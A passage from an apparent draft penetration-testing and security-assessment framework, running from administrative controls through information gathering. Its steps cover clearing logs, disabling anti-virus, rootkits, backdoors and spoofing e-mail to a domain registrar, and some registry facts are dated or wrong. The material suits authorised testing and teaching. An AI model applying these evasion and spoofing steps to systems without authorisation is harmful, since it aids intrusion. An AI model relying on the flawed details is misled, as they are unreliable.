This is achieved by ensuring that no complete operation cycles are completed by a
single individual or no operation cycles that have significant security content is
completed by a single individual. The various duties constituting a transaction cycle is
segregated and given for completion by two or more people who are normally peers. If
the duties are segregated the chances that certain privileges may be misused are
reduced greatly. If the system administrators’ role is to create user accounts and give
access to system users & also ensure optimal performance of the systems. All this
activity can be logged and monitored by staff dedicated to doing system monitoring. Only
collusion by individuals from the two roles can bypass the security provided by this
approach.
Structure based Controls
Similarly it might make sense to split up the duties in the information security organization as well, e.g. having a separate Information Risk Management team & an information security team might help in segregation of duties. The information risk management team can conduct risk assessments and advise the various business groups on the steps needed to be in compliance with the company’s information security policies. The information security staff should be made responsible for seeing to it that the required controls have been implemented, and the information risk management team should report on their effectiveness. This avoids any complacency in the information security team, & an authentic report is created because it is produced by the IRM team, whose goal is to find & report on the security flaws within the information systems deployed.
Another important part, which determines the company’s security, is the Internal Audit Department. This department should never be aligned to the information security function and should ideally report to the CEO of the company. The internal audit’s responsibilities are to check compliance with the organization’s security policies & report any anomalies found to the concerned authority. The audit is generally a half-yearly or yearly exercise & can be considered a very rigorous check of the controls deployed within the company.
7.5.3 Two-person Controls
Another form of administrative control that harnesses the organization structure is two-person controls. In this situation, the rationale is similar to that which justifies segregation of duties. However, unlike segregation of duties, which requires two persons to do different but sequenced operations to complete a process cycle, in the case of two-person controls two persons simultaneously perform certain operations so that in the absence of one, the other cannot complete the process or operation.
7.5.4 Peer Review
Unlike a supervisory review, which comes with its share of psychological and behavioral issues, the concept of peer review of security operations has come to be accepted amongst security professionals as a good organizational control mechanism. In this process, the work of one person is reviewed by his/her peer. The peer is often as knowledgeable as the person who performed the operation. A healthy competition exists which assists the organization in bringing a higher degree of expertise into play. Of course, it also grants the organization an additional layer of security since the peers, being professionals, would bring to light any attempted action by any person that would result in a security infraction, whether such action is with malicious intent or due to ignorance or negligence.
7.5.5 Mandatory Vacations
This form of administrative control has been recommended for quite some time now and has yielded good results in organizations that have implemented it. This control stems from the belief that anyone involved in a security infraction would be able to hide it successfully so long as he/she is able to be present at the place of the security violation and can continue to cover up the violation. It is therefore recommended that every person involved in any operation that has a security element in it should be asked to go on regular vacation. The obvious reason being that while the person is on vacation, his/her successor who handles the operations would find any security infraction that had been carefully concealed by the earlier person.
8 ASSESS ENTERPRISE SECURITY & CONTROLS
[This page is intentionally left blank.]
A PENETRATION TESTING - METHODOLOGY
A technical security audit of an organization’s information technology infrastructure
helps management in taking decisions on appropriate security investments and course
of action to correct or improve security. One of the main parts of such a security audit is
penetration testing. This chapter describes the process of performing a penetration test,
covering the following steps:
1. Information Gathering
2. Network Mapping
3. Vulnerability Identification
4. Penetration
5. Gaining Access & Privilege Escalation
6. Enumerate Further
7. Compromise Remote Users/Sites
8. Maintaining Access
9. Covering The Tracks
10. Audit
11. Reporting
12. Clean up and Destroy Artifacts
[Figure: Technical Control Assessment cycle – 1 Information Gathering, 2 Network Mapping, 3 Vulnerability Identification, 4 Penetration, 5 Gaining Access & Privilege Escalation, 6 Enumerate Further, 7 Compromise Remote Users/Sites, 8 Maintaining Access, 9 Covering Tracks, 10 Auditing, 11 Reporting, 12 Clean Up and Destroy Artifacts]
A.1 INFORMATION GATHERING
Information gathering is essentially using the Internet to find all the information you can about the target (company and/or person) using both technical (DNS/WHOIS) and non-technical (search engines, news groups, mailing lists etc…) methods. This is the initial stage of any information security audit, which many people tend to overlook. When performing any kind of test on an information system, information gathering and data mining is essential and provides you with all possible information to continue with the test. Whilst conducting information gathering, it is important to be as imaginative as possible. Attempt to explore every possible avenue to gain more understanding of your target and its resources. Anything you can get a hold of during this stage of testing is useful: company brochures, business cards, leaflets, newspaper adverts, internal paperwork, and so on.
Information gathering does not require that the assessor establishes contact with the target system. Information is collected from public sources on the Internet (mainly) and from organizations that hold public information (e.g. tax agencies, libraries, etc.).
This section of the assessment is extremely important for the assessor. Assessments are generally limited in time and resources. Therefore, it is critical to identify the points that are most likely to be vulnerable, and to focus on them. Even the best tools are useless if not used appropriately and in the right place and time. That’s why experienced assessors invest a considerable amount of time in information gathering.
A.2 NETWORK MAPPING
Following the first section, when all possible information about the target has been
acquired, a more technical approach is taken to ‘footprint’ the network and resources in
question. Network specific information from the previous section is taken and expanded
upon to produce a probable network topology for the target. Many tools and applications
can be used in this stage to aid the discovery of technical information about the hosts
and networks involved in the test.
• Find live hosts
• Port and service scanning
• Perimeter network mapping (router, firewalls)
• Identifying critical services
• Operating system fingerprinting
• Identifying routes using Management Information Base (MIB)
• Service fingerprinting
To be effective, network mapping should be performed according to a plan. This plan will include probable weak points and/or points that are most important to the assessed organization, and will take into consideration all information obtained in the previous section.
Network mapping will help the assessor to fine tune the information previously acquired
and to confirm or dismiss some hypotheses regarding target systems (e.g. purpose,
software/hardware brands, configuration, architecture, relationship with other resources
and relationship with business process).
A.3 VULNERABILITY IDENTIFICATION
Before starting this section, the assessor will have selected specific points to test and
how to test them. During vulnerability identification, the assessor will perform several
activities to detect exploitable weak points. These activities include:
• Identify vulnerable services using service banners
• Perform a vulnerability scan to search for known vulnerabilities. Information regarding known vulnerabilities can be obtained from the vendors’ security announcements, or from public databases such as CVE or CERT advisories.
• Perform false positive and false negative verification (e.g. by correlating vulnerabilities with each other and with previously acquired information)
• Enumerate discovered vulnerabilities
• Estimate probable impact (classify vulnerabilities found)
• Identify attack paths and scenarios for exploitation
A.4 PENETRATION
The assessor tries to gain unauthorized access by circumventing the security measures in place and tries to reach as wide a level of access as possible. This process can be divided into the following steps:
• Find proof of concept code/tool
  Find proof of concept code available in your own repository or from publicly available sources to test for vulnerabilities. If the code is from your own trusted repository and thoroughly tested, you can use it, otherwise test it in an isolated environment.
• Develop tools/scripts
  Under some circumstances it will be necessary (and cost effective) for the assessors to create their own tools and scripts.
• Test proof of concept code/tool
  o Customize proof of concept code/tool
  o Test proof of concept code/tool in an isolated environment
• Use proof of concept code against target
  The proof of concept code/tool is used against the target to gain as many points of unauthorized access as possible.
• Verify or disprove the existence of vulnerabilities
  Only by testing vulnerabilities will the assessors be able to confirm or disprove vulnerabilities definitively.
• Document findings
  This documentation will contain detailed explanations of exploitation paths, assessed impact and proof of the existence of vulnerabilities.
A.5 GAINING ACCESS AND PRIVILEGE ESCALATION
In any given situation a system can be enumerated further. Activities in this section will
allow the assessors to confirm and document probable intrusion and/or automated
attacks propagation. This allows for a better impact assessment for the target
organization as a whole.
A.5.1 Gaining Access
A.5.1.1 GAIN LEAST PRIVILEGE
Gaining least privilege access is possible by obtaining access to unprivileged accounts through several means, including:
• Discovery of username/password combinations (e.g. dictionary attacks, brute force attacks)
• Discovery of blank passwords or default passwords in system accounts
• Exploiting vendor default settings (such as network configuration parameters, passwords and others)
• Discovery of public services that allow for certain operations within the system (e.g. writing/creating/reading files)
A.5.1.2 GAIN INTERMEDIATE PRIVILEGE
(*** NOTE: BALWANT: I would leave a single section on “Gain privilege”, instead of having a “gain least…” and a “gain intermediate….” sections.
A.5.1.3 COMPROMISE
Reaching the target of the assessment (be it a specific system or a network) may require that intermediate systems be compromised as well, in order to bypass their security measures that may be potentially protecting access to the assessor’s final target. These possible intermediate hops can be routers, firewalls, domain member servers, or workstations, to name a few.
A.5.1.4 FINAL COMPROMISE ON TARGET
This step is the final compromise. The final target has been breached and is under
complete control of the assessor.
A.5.2 Privilege Escalation
If access is gained, follow steps 1 to 6 again.
A.6 ENUMERATE FURTHER
• Perform password attacks to find additional accounts (by using sniffing or password cracking)
• Sniff traffic and analyze it
• Gather cookies and use them to exploit sessions and for password attacks
• E-mail address gathering
• Identifying routes and networks
• Mapping internal networks
• Perform steps 1 to 6 again with this system as starting point
A.7 COMPROMISE REMOTE USERS/SITES
A single hole is sufficient to expose the entire network, regardless of how secure the perimeter network may be. Any system is as strong (in this case, as secure) as the weakest of its parts.
Communications between remote users/sites and enterprise networks may be provided with authentication and confidentiality, by using technologies such as VPN, to ensure that the data in transit over the network cannot be faked nor eavesdropped. However, this does not guarantee that the communication endpoints haven’t been compromised.
The assessor should try to compromise remote users, telecommuters and/or remote sites of an enterprise. This will give privileged access to the internal network.
If you are successful in gaining access to remote sites, follow steps 1.1 to 1.7, else move to the next step.
A.8 MAINTAINING ACCESS
A.8.1 Covert Channels
Covert channels can also be used to hide your presence on systems or on the network. Covert channels can be either protocol tunnels (like icmp-tunnel, http-tunnel etc…) or can (ab)use VPN tunnels. Perform the following steps to use covert channels:
• Identify Covert Channel Which Can Be Used
• Select the Best Available Tool for the Covert Channel
• Methodology - Setup the Covert Channel in the Target Network
• Test the Covertness of Channel Using Common Detection Technique
A.8.2 Backdoors
Backdoors are meant to be able to always get back to a certain system, even if the
account you used to hack the system is no longer available (has been terminated, for
example). Backdoors can be created in several ways. Either by using root-kits (see
further), by opening a listening port on the target system, by letting the target system
connect to your server, by setting up a listener for a certain packet sequence which in
turn will open up a port…
A.8.3 Root-kits
Root-kits will allow you to have even more power than the system administrator does of
a system. You will be able to control the remote system completely.
A.9 COVER THE TRACKS
A.9.1 Hide Files
Hiding files is important for the security assessor/auditor to hide the activities carried out so far, during and after compromising the system, and to maintain back channel[s]. It is also important to hide the assessor’s tools so that they need not be uploaded each time to the target server.
A.9.2 Clear Logs
The importance of this stage is easily understood but usually understated. After an attacker has successfully compromised a system, he will want to keep it without alerting the administrator, for obvious reasons. The longer the attacker stays on a compromised system, the better the chances that he will be able to achieve his goals further in the network.
During the process of compromising the system, some suspicious and/or erroneous activities are logged. A skilled attacker knows that logs need to be doctored. He modifies them to cover his tracks and conceal his presence.
Note: This is only effective if no remote Syslog servers are in use. If there are, these remote Syslog servers will have to be hacked & cleared as well…
Methodology
• Check History
• Edit Log files
A.9.3 Defeat integrity checking
[Text]
A.9.4 Defeat Anti-virus
Nowadays, on most workstations and servers, Anti-Virus software is protecting the system against well known malicious software (like exploits, viruses, worms…). The importance of this step in penetration testing is to be able to disable or defeat AV software so that the assessor is able to come back later (just testing the possibility).
In most centrally managed AV solutions, the AV software is restarted after a certain amount of time when it is stopped by an assessor. This “grace period” allows the assessor to perform several tasks so that the AV software will be disabled for longer periods of time.
Possible things that assessors can do (most of these require Administrator level access):
• Creating a batch file so that the AV services are stopped every 30 sec
• Disabling the AV services
• Blocking the central management port
A.9.5 Implement Root-kits
Root-kits, like POC exploits, should be customized to be able to completely cover us. In most cases, if there is an AV patrolling, root-kits (usually on win32) would be detected before installation. So, tampering with the root-kits is required in most situations. It’s also important to notice that some root-kits won’t work on different system setups. For example, your root-kit may work on win2k-SP3 but it can’t cover anything on SP4.
A.10 AUDIT
Sometimes, system audits can tell even more about potential security vulnerabilities than a single penetration test. Therefore, system audits should be performed after completing a penetration test. The system audits should check for running services, open ports, established connections, file system permissions, logging and/or remote logging, and auditing as per the detailed check list of the particular system.
A.11 REPORTING
The reporting should follow a well documented structure. Things that should definitely be in the report are the following parts:
• Management summary
• Scope of the project (and out of scope parts)
• Tools that have been used (including exploits)
• Dates & times of the actual tests on the systems
• Every single output of tests performed (excluding vulnerability scan reports, which can be included as attachments)
• A list of all identified vulnerabilities with included recommendations on how to “cure” the vulnerabilities found.
• A list of action points (what recommendation to perform first, what is the recommendation curing?)
For more detail refer to the vulnerabilities section.
A.12 CLEAN UP AND DESTROY ARTIFACTS
All information that is created and/or stored on the tested systems should be removed from these systems. If this is for some reason not possible remotely, all these files (with their location) should be mentioned in the technical report so that the client technical staff will be able to remove them after the report has been received.
B PENETRATION TESTING METHODOLOGY: DESCRIPTIVE – (CONTINUE….)
B.1 INFORMATION GATHERING
Description
Information gathering consists of collecting all possible information about the target of
the security assessment to help the assessor to perform a thorough security evaluation.
In most cases the main source (and possibly the only one) of information is the Internet.
The Internet can provide information about the target (company and/or person) using
several methods, both technical (e.g. DNS/WHOIS) and non-technical (search engines,
news groups, mailing lists, etc…).
This is the initial stage of any information security audit, which is often overlooked. When
performing any kind of test on an information system, information gathering and data
mining is essential and provides you with all possible information to continue with the
test. Whilst conducting information gathering, it is important to be as imaginative as
possible. Attempt to explore every possible avenue to gain more understanding of your
target and its resources. Anything you can get a hold of during this stage of testing is
useful: company brochures, business cards, leaflets, newspaper adverts, internal
paperwork, and so on.
Goal
The aim of information gathering is exploring every possible avenue of attack; it gives a
complete overview of the target and their practices, enabling you to test every vector
relating to their information security. From gathering information using the techniques
and resources outlined in this document you can learn many things about a target’s
information systems (e.g. what phone system they use, what OS’s they have on-site,
how many employees they have, financial data, security history, and so on).
This step enables you to be as thorough as possible during all other stages of the
methodology. Gathering information enables you to test every entry vector and allows
you to map out a virtual topology of a person and/or their company, assets, and
associated.
Expected Results
After following the mentioned steps, a pen-assessor may be able to gain insight into the target network:
• Employees (name and number of employees, role, positions and contact details)
• Technology partners (technologies used, locations, computing platforms)
• Business partners (involvement, location, their trust relationship, and so on)
• Business/financial history, investments, and investor details
• Web presence (name and number of domains, where they are hosted, etc.)
• Physical locations (offices, data centers, partners, warehouses)
• Network topology and architecture
• Technologies being implemented on the network
• E-mails, phone numbers, or any other personal information
• Company location, product names, and names of senior managers in the company
• IP block owned
• Administration and maintenance contact for target domain and IP block
Pre-requisite
An Internet connection and a good imagination; logins to any associated business portals would also be useful, but these may be gathered in later stages.
History
This section has the longest history as data gathering has been used in many areas long
before the advent of computers. For example Sun Tzu said:
“With advance information, costly mistakes can be avoided, destruction averted,
and the way to lasting victory made clear.”
And
“Investigate and plan before moving to the open battlefield, thus minimizing harm
to self and the opponent”
The idea of information gathering runs throughout The Art of War, and it emphasizes how important gaining knowledge about any adversary is. This is also the case during a security test/audit as, in a way, it is a simulated cyber war, which in many ways can benefit from the wisdom of Sun Tzu.
The gathering of data allows a security assessor to be cautious, to move through target networks and data systems silently, and to assess the strengths and the weaknesses of the information systems involved.
Of course, there are many other areas that have used information gathering such as corporate and political espionage, wartime reconnaissance, and similar situations.
Information gathering can be divided into two parts: 1. Passive information gathering and 2. Active information gathering.
PASSIVE INFORMATION GATHERING
As per the dictionary, passive means “accepting or allowing what happens or what others do, without active response or resistance”.
In the context of this framework, “Passive Information Gathering” means that the target is not probed at all.
Methodology
• Locate the target Web presence
• Examine the target using search engines
• Search Web groups
• Search employee personal Web sites
• Search Security & Exchange Commission and finance sites
• Search uptime statistics sites
• Search system/network survey sites
• Search on P2P networks
• Search on Internet Relay Chat (IRC)
• Search job databases
• Search newsgroups (NNTP)
• Gain information from domain registrar
  o Check for reverse DNS lookup presence
  o Check more DNS information
  o Check Spam database lookup
  o Check to change whois information
B.1.1 Locate the Target Web Presence
Description
The first thing to do is to identify any online presence the target has using information from initial contacts, e.g. e-mails, business cards, brochures, leaflets, etc.
Following this, you can take your contact’s e-mail address or the website from the business card and/or brochure to gather more data.
Process
• Find target in all common search engines (using business name)
• Find Web presence (you may have this from the e-mail address already)
• B2B – Web points of presence for business-to-business transactions (e.g. a partner portal)
• B2E – Web points of presence for business-to-enterprise communication (e.g. Web-enabled intranet site)
• B2C – Web points of presence for business-to-customer transactions (e.g. an e-commerce website)
Tips
Generally one will get the best results using various keyword combinations such as:
• Target name
• Location
• Industry
• Product type
• Product lines/names
• Contact names
Countermeasures
Have a policy describing what information should or should not be published on the public
website.
Links
Watching_the_Watchers_II-2 by j0hnny
Tools
The best choices in most situations are http://www.google.com, http://www.dogpile.com/,
www.alltheweb.com and http://www.infoseek.com.
http://www.kartoo.com - provides a good visual link between organizations and individuals.
Remarks
B.1.2 Examine Domain Name System - Find Out Domain Registration Info and IP Block Owned
Description
Domain name and IP block information can be retrieved from ICANN assigned Regional Internet Registries (RIR). ICANN stands for Internet Corporation for Assigned Names and Numbers. It is a non-profit organization that distributes domain names and IP addresses.
Domain Names are managed by many organizations:
Web Site            Country
www.internic.net    United States
www.nic.uk          United Kingdom
There are four Regional Internet Registries (RIR) assigned by ICANN, which are responsible for allocating IP Addresses, domain names, autonomous system numbers…
• APNIC - Asia-Pacific Network Information Center
• ARIN - North and South America and sub-Saharan Africa
• LACNIC - Latin American and Caribbean Internet Addresses Registry
• RIPE NCC - Europe, the Middle East and parts of Africa
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Use general names (like postmaster)
• Use general email addresses (like postmaster@company.com)
• Use one single phone number that is normally not published to the outside world. If calls are coming in on that phone line, you’ll know where they’ve found that number…
Links
Tools
• http://www.geektools.com/whois.php
• http://whois.netsol.com
• http://whois.sc
• http://arin.com/whois.html
• http://ripe.com/whois.html
• www.samspade.org
• http://www.cotse.com/
Remarks
Typically the RIR WHOIS databases will not locate any domain-related information or any
information relating to military networks.
B.1.3 Examine Domain Name System - Check for the Authoritative Name Servers
Description
The Authoritative name server(s) for a certain domain(s) hold the zone file(s) for that
specific domain(s). This information is therefore important for performing zone transfers.
These authoritative name servers can be found in two separate ways. The first is through
the whois services, the second through the use of the DNS infrastructure.
Tools for use with the DNS infrastructure:
• dig
• nslookup
Examples/Results
# dig ns oissg.org @<random dns server>
; <<>> DiG 8.3 <<>> ns oissg.org @<random dns server>
; (1 server found)
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 3
;; QUERY SECTION:
;;      oissg.org, type = NS, class = IN
;; ANSWER SECTION:
oissg.org.              2d22h14m44s IN NS  a.ns.oissg.org.
oissg.org.              2d22h14m44s IN NS  b.ns.oissg.org.
oissg.org.              2d22h14m44s IN NS  c.ns.oissg.org.
;; ADDITIONAL SECTION:
a.ns.oissg.org.         2d22h14m44s IN A   212.13.198.37
b.ns.oissg.org.         2d22h14m44s IN A   212.158.214.187
c.ns.oissg.org.         2d22h14m44s IN A   212.13.198.38

C:\>nslookup
Default Server: <random dns server>
Address: <random dns server>
> set q=ns
> oissg.org
Server: <random dns server>
Address: <random dns server>
Non-authoritative answer:
oissg.org       nameserver = a.ns.oissg.org
oissg.org       nameserver = b.ns.oissg.org
oissg.org       nameserver = c.ns.oissg.org
a.ns.oissg.org  internet address = 212.13.198.37
b.ns.oissg.org  internet address = 212.158.214.187
c.ns.oissg.org  internet address = 212.13.198.38
Analysis/Conclusion/Observation
The result of this step should be a list with all authoritative nameservers for the tested
company.
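As an added example (not part of the ISSAF text), the following Python script turns dig output like the one above into that list: it parses the ANSWER and ADDITIONAL sections and maps each NS record for the queried domain to its glue A record, returning nothing when the query status is not NOERROR so a failed query is not mistaken for "no name servers". The embedded output is a constructed copy of the oissg.org example from this section.

```python
import re

# Constructed sample: the dig 8.x output shown in this section, one record per line.
SAMPLE_DIG_OUTPUT = """\
; <<>> DiG 8.3 <<>> ns oissg.org @<random dns server>
; (1 server found)
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 3
;; QUERY SECTION:
;;      oissg.org, type = NS, class = IN

;; ANSWER SECTION:
oissg.org.              2d22h14m44s IN NS  a.ns.oissg.org.
oissg.org.              2d22h14m44s IN NS  b.ns.oissg.org.
oissg.org.              2d22h14m44s IN NS  c.ns.oissg.org.

;; ADDITIONAL SECTION:
a.ns.oissg.org.         2d22h14m44s IN A   212.13.198.37
b.ns.oissg.org.         2d22h14m44s IN A   212.158.214.187
c.ns.oissg.org.         2d22h14m44s IN A   212.13.198.38
"""

SECTION_RE = re.compile(r"^;; (\w+) SECTION:")
STATUS_RE = re.compile(r"status: (\w+)")
# owner  ttl  IN  type  rdata   (dig 8 prints TTLs such as 2d22h14m44s)
RR_RE = re.compile(r"^(\S+)\s+(\S+)\s+IN\s+(\S+)\s+(\S+)\s*$")


def canon(name):
    """Normalize a DNS name: strip the trailing dot and lower-case it."""
    return name.rstrip(".").lower()


def parse_dig(output):
    """Return (status, {section: [(owner, ttl, type, rdata), ...]})."""
    status, sections, current = None, {}, None
    for line in output.splitlines():
        m = STATUS_RE.search(line)
        if line.startswith(";; ->>HEADER<<-") and m:
            status = m.group(1)
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
            continue
        # comment lines (';'), blank lines and text before the first section are skipped
        if not line.strip() or line.startswith(";") or current is None:
            continue
        m = RR_RE.match(line)
        if m:
            owner, ttl, rtype, rdata = m.groups()
            sections[current].append((canon(owner), ttl, rtype.upper(), rdata))
    return status, sections


def authoritative_name_servers(output, domain):
    """Map each NS of `domain` to its glue A record (None when no glue was returned).

    An empty dict means the query failed or carried no NS records for the domain,
    so the assessor re-queries instead of reporting 'no name servers'.
    """
    status, sections = parse_dig(output)
    if status != "NOERROR":
        return {}
    glue = {owner: rdata for owner, _, rtype, rdata in sections.get("ADDITIONAL", [])
            if rtype == "A"}
    servers = {}
    for owner, _, rtype, rdata in sections.get("ANSWER", []):
        if rtype == "NS" and owner == canon(domain):
            servers[canon(rdata)] = glue.get(canon(rdata))
    return servers


if __name__ == "__main__":
    for ns, addr in authoritative_name_servers(SAMPLE_DIG_OUTPUT, "oissg.org").items():
        print(f"{ns:20s} {addr or '(no glue)'}")
```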
Countermeasures
No countermeasure, this is a prerequisite for the internet to work …
Links
Tools
• dig
• nslookup
Remarks
Typically the RIR WHOIS databases will not locate any domain-related information or any
information relating to military networks.
The whois services also show you the authoritative name servers for the domain you
performed a whois of.
B.1.4 Examine Domain Name System - Check for Reverse DNS lookup presence
Description
Reverse DNS lookup will obtain the authoritative name server(s) for a certain domain(s), which hold the zone file(s) for that specific domain(s). This information is therefore important for performing zone transfers.
Reverse DNS lookup uses an IP address instead of the domain name of a server.
Tools for use with the DNS infrastructure:
• dig
• nslookup
Examples/Results
Analysis/Conclusion/Observation
The result of this step should be a list with all authoritative nameservers for the tested
company.
Countermeasures
Disable reverse DNS in the server configuration if possible. It is not a prerequisite for network operation.
Links
Check some more DNS information
• http://www.dnsstuff.com
• http://www.dnsreport.com
Tools
• nslookup
• dig
• host
• whois.sc reverse DNS tool (requires free registration)
Remarks
Just because a host has forward DNS from name to address there's no guarantee or
requirement for it to have reverse DNS from address to name. Many sites do, many sites
don't.
B.1.5 Examine Domain Name System - Check Spam/Attackers databases lookup
Description
By checking for the presence of IP addresses in spam and attackers (hacking, viruses) lists
a consultant can quickly determine if there has been a policy violation or probable intrusion.
Process
Create a list of IP addresses that includes at least the mail and web server addresses (these addresses can be obtained during other information gathering checks). Search public spam blacklists for these addresses, such as:
• Spamhaus
• Spamcop
• RBLs
• SANS ISC
Look for spam information using public search engines, and queries involving the IP addresses and the word SPAM (e.g. “127.0.0.1 spam“).
Analysis/Conclusion/Observation
The appearance of an IP address in these lists is an indication of a probable policy violation, either by company personnel or even an intrusion.
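As an added example (not from the ISSAF text), the following Python code performs the blacklist check described above the way DNS-based blocklists expect it: the IPv4 octets are reversed and prefixed to the list’s zone, and an A answer inside 127.0.0.0/8 means the address is listed. The zone names for Spamhaus and SpamCop are taken from their public documentation and are assumptions here; the sample server addresses and the offline resolver answers are constructed.

```python
import ipaddress
import socket

# Query zones of the lists named in this section (assumed from public documentation).
DNSBL_ZONES = {
    "Spamhaus ZEN": "zen.spamhaus.org",
    "SpamCop": "bl.spamcop.net",
}

LISTED_RANGE = ipaddress.ip_network("127.0.0.0/8")


def dnsbl_query_name(ip, zone):
    """203.0.113.5 checked against zen.spamhaus.org -> 5.113.0.203.zen.spamhaus.org"""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def system_resolver(name):
    """Resolve with the OS resolver; None means NXDOMAIN, i.e. not listed."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def check_ip(ip, zones=DNSBL_ZONES, resolve=system_resolver):
    """Return {list name: return code or None}.

    Only answers inside 127.0.0.0/8 count as a listing; this filters out
    resolvers that wildcard non-existent names to some real address.
    """
    results = {}
    for label, zone in zones.items():
        answer = resolve(dnsbl_query_name(ip, zone))
        listed = answer is not None and ipaddress.ip_address(answer) in LISTED_RANGE
        results[label] = answer if listed else None
    return results


def check_address_list(ips, zones=DNSBL_ZONES, resolve=system_resolver):
    """Return only the addresses found on at least one list, with the per-list return code.

    What a code means (spam source, open proxy, policy block) is defined by each list.
    """
    hits = {}
    for ip in ips:
        codes = {k: v for k, v in check_ip(ip, zones, resolve).items() if v is not None}
        if codes:
            hits[ip] = codes
    return hits


# Constructed offline stand-in for the DNSBL answers (TEST-NET addresses, RFC 5737):
# the mail server is listed on ZEN; the web server's SpamCop query gets a non-127/8
# answer (a wildcarding resolver) that must NOT be treated as a listing.
FAKE_ANSWERS = {
    "5.113.0.203.zen.spamhaus.org": "127.0.0.2",
    "10.100.51.198.bl.spamcop.net": "192.0.2.80",
}


def fake_resolver(name):
    return FAKE_ANSWERS.get(name)


if __name__ == "__main__":
    servers = ["203.0.113.5", "198.51.100.10"]  # constructed: mail and web server
    for ip, codes in check_address_list(servers, resolve=fake_resolver).items():
        print(ip, codes)
```

Replace `fake_resolver` with the default `system_resolver` to query the real lists for the addresses collected in this step.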
Countermeasures
Links
• www.spamhaus.org
• www.spamcop.net
• rbls.org
• isc.sans.org
• www.dshield.org
Tools
Public spam black lists, attackers/virus distribution lists on the Internet and search engines.
B.1.6 Examine Domain Name System - Check to change whois information
Description
The registrar gives two options for authentication:
• A mail from the Point of Contact (PoC)
• A mail signed with PGP
If a spoofed mail is sent masquerading as the PoC, the registrar will change the whois information according to the instructions in the e-mail. Read the Remarks section carefully before proceeding with this test.
Process
• Send a spoofed e-mail masquerading as PoC to the Registrar.
• Alternatively, send the request through the Registrar’s Web interface, if available.
Analysis/Conclusion/Observation
Being able to change whois information without proper authorization is considered an
important vulnerability.
Countermeasures
• Establish change procedures for whois information with registrar
• Restrict access to contact information for changes in registrar
• Avoid using information from an individual (name, email) for contact information; use a position and generic accounts (email specific for this task) instead.
Links
• www.internic.net/regist.html
Tools
• telnet client (manual spoofing with smtp protocol)
• netcat (manual spoofing with smtp protocol)
• scripts for automating email spoofing
Remarks
This check involves a third party and could have an impact on the client’s operation, if successful. Make sure that the contract is able to support this activity with the third party (Registrar), and that it lies within the scope defined at the contract, otherwise DO NOT proceed with this test.
Sometimes, the organization being assessed will have a contract allowing it to test the
security of infrastructure and services provided by third parties. It is common that this
contract allows another third party (consultant) to perform the security assessment.
An alternative to asking for changes is to send an email that just informs that changes be
done in the future (e.g. a week later). The registrar will either inform that they will make
changes or try to authenticate the request through approved means (e.g. by telephone).
B.1.7 Search Job Databases
Description
Just like regular search engines, job search sites can reveal a plethora of information on the
technology and services running on the target's internal network. A pen-assessor should
carefully review the job postings published by the target on its own website or on other
popular job search sites.
Process
• Check for resumes available on the target website
• Check various job databases
• Search using search engines
• Check for job postings on the target website
• Check for job postings on job sites
• Gather all e-mail addresses, phone numbers, and contact details
• Focus on resumes/ads where experience with specific technologies is required
• Try to correlate the technologies with the target's product information gained from the
aforementioned steps
• Gain more information on their business structure from such postings
• Confirm their B2B / B2E / B2C relationships gained from the aforementioned topics
Analysis/Conclusion/Observation
Depending on the kind of information found, the results of this test may reveal information
rated low to high. Finding critical information through this test might indicate the lack of
appropriate information protection.
Countermeasures
• Establish clear and formal confidentiality agreements
Links
• Monster and its country-specific sites
• www.flipdog.com
• Google Jobs
• www.careerbuilder.com
Europe
• www.stepstone.com
Germany
• www.jobpilot.de
• www.jobstairs.de
Tools
• Any web browser
B.1.8 Examine Target Using Search Engines
Description
Search engines can be used to gather interesting information about a target while
protecting one's anonymity. They should be used for regular websites as well as for
searching newsgroup archives.
Process
• Search for the domain name preceded by the @ symbol (@target.com) to scour for e-mail
addresses within the target organization and build a database from them
• Add all e-mail addresses gathered from initial conversations with the customer to the
database
• Search for the target organization's (complete) e-mail addresses gathered in the previous
two steps on web search engines and in groups in order to profile each employee
• Search for employee names, if they are part of the e-mail addresses, on web search
engines and in groups
• Attempt to bypass authentication using search engines (i.e. look for pages behind a
login that were nonetheless indexed or cached)
• Review the target website using the search engines' cache in order to evade the target's
logs.
  o Check partners (to find out technologies used)
  o Check other than main pages (sub-domains/folders):
    - services.target.com
    - support.target.com
    - target.com/support
    - target.com/sales
  o Collect:
    - Names, phone numbers, e-mail addresses
    - Recent activities/happenings
    - Technologies used
Gaining personal information on a specific employee from the target's website can be
beneficial for conducting social engineering. Moreover, personal resumes on the target's
website can give insight into the technologies used.
• Search for e-mails from their domain posted in mail groups that reveal information
regarding the internal network architecture.
• Browse through news-search services to get more information on their business
structure.
• Probe into their B2B / B2E / B2C relationships, which might give helpful insight into the
trust relationships of their network.
• Scan through all the e-mail signatures to gain all possible e-mail and phone number
information. This could be used in later stages for war-dialing or social engineering.
• Familiarize oneself with company-specific information such as an organizational map
with details of senior managers, and the company's product names and details.
• Finally, put all information together into the organizational map started in the previous
step.
• Search newsgroup postings for information related to the target
• Pay special attention to technical newsgroups (comp.*)
• Search for technical questions in newsgroups
• Collect the following:
  o E-mail addresses
  o Names
  o Addresses
  o Phone numbers
• Carry out a search by author
• Check group archives (derkeiler, freenet.de, Google)
Important group list
  o Google Groups
  o Yahoo! Groups
  o Mailing lists and archives
  o Microsoft online NNTP servers
  o Linux user community
  o Security product groups/mailing lists
  o Networking groups/mailing lists (vendor specific/industry standard)
Using search engines to identify target users
• Determine all of the servers the search engine knows of for www.segress.com, e.g.:
    segress site:.segress.com
• Search for contact details, e.g.:
    +"www.oissg.org" +phone +fax
• Determine all the indexed directories listed in *.segress.com:
    allintitle: "index of /" site:.segress.com
Analysis/Conclusion/Observation
After examining the target using search engines, an initial understanding of the target
should have been gained.
Countermeasures
• Apply appropriate exclusions in robots.txt files for pages that have personal and
sensitive information (this information would still be available to users of the site,
but won't be collected by most web spiders and won't show up in those search
engines). Note that robots.txt is itself public and lists the excluded paths; it is a hint to
